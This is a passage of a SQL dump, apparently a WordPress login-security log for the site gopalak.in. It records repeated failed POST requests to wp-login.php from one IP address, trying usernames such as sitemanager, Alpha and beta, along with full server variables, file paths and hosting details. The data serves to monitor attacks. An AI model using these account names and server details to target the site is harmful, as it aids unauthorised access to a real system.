0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745432686.581244;s:12:\"REQUEST_TIME\";i:1745432686;}}','13.201.132.241',0,'2025-04-23 23:54:48','1970-01-01 00:00:00'),(93981,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"122\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"13.201.132.241\";s:14:\"HTTP_X_REAL_IP\";s:14:\"13.201.132.241\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"13.201.132.241\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"122\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745433084.102488;s:12:\"REQUEST_TIME\";i:1745433084;}}','13.201.132.241',0,'2025-04-24 00:01:26','1970-01-01 00:00:00'),(93982,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"114\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"13.201.132.241\";s:14:\"HTTP_X_REAL_IP\";s:14:\"13.201.132.241\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"13.201.132.241\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"114\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745433084.105303;s:12:\"REQUEST_TIME\";i:1745433084;}}','13.201.132.241',0,'2025-04-24 00:01:26','1970-01-01 00:00:00'),(93983,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"13.201.132.241\";s:14:\"HTTP_X_REAL_IP\";s:14:\"13.201.132.241\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"13.201.132.241\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745433084.103363;s:12:\"REQUEST_TIME\";i:1745433084;}}','13.201.132.241',0,'2025-04-24 00:01:26','1970-01-01 00:00:00'),(93984,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"13.201.132.241\";s:14:\"HTTP_X_REAL_IP\";s:14:\"13.201.132.241\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"13.201.132.241\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745433084.104389;s:12:\"REQUEST_TIME\";i:1745433084;}}','13.201.132.241',0,'2025-04-24 00:01:26','1970-01-01 00:00:00'),(93985,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"13.201.132.241\";s:14:\"HTTP_X_REAL_IP\";s:14:\"13.201.132.241\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"13.201.132.241\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745433085.9908011;s:12:\"REQUEST_TIME\";i:1745433085;}}','13.201.132.241',0,'2025-04-24 00:01:27','1970-01-01 00:00:00'),(93986,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"13.201.132.241\";s:14:\"HTTP_X_REAL_IP\";s:14:\"13.201.132.241\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"13.201.132.241\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745433474.645977;s:12:\"REQUEST_TIME\";i:1745433474;}}','13.201.132.241',0,'2025-04-24 00:07:56','1970-01-01 00:00:00'),(93987,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"13.201.132.241\";s:14:\"HTTP_X_REAL_IP\";s:14:\"13.201.132.241\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"13.201.132.241\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745433474.6747091;s:12:\"REQUEST_TIME\";i:1745433474;}}','13.201.132.241',0,'2025-04-24 00:07:56','1970-01-01 00:00:00'),(93988,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"13.201.132.241\";s:14:\"HTTP_X_REAL_IP\";s:14:\"13.201.132.241\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"13.201.132.241\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745433474.675427;s:12:\"REQUEST_TIME\";i:1745433474;}}','13.201.132.241',0,'2025-04-24 00:07:56','1970-01-01 00:00:00'),(93989,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"13.201.132.241\";s:14:\"HTTP_X_REAL_IP\";s:14:\"13.201.132.241\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"13.201.132.241\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745433474.684818;s:12:\"REQUEST_TIME\";i:1745433474;}}','13.201.132.241',0,'2025-04-24 00:07:56','1970-01-01 00:00:00'),(93990,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"13.201.132.241\";s:14:\"HTTP_X_REAL_IP\";s:14:\"13.201.132.241\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"13.201.132.241\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745433474.6307099;s:12:\"REQUEST_TIME\";i:1745433474;}}','13.201.132.241',0,'2025-04-24 00:07:56','1970-01-01 00:00:00'),(93991,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"13.201.132.241\";s:14:\"HTTP_X_REAL_IP\";s:14:\"13.201.132.241\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"13.201.132.241\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";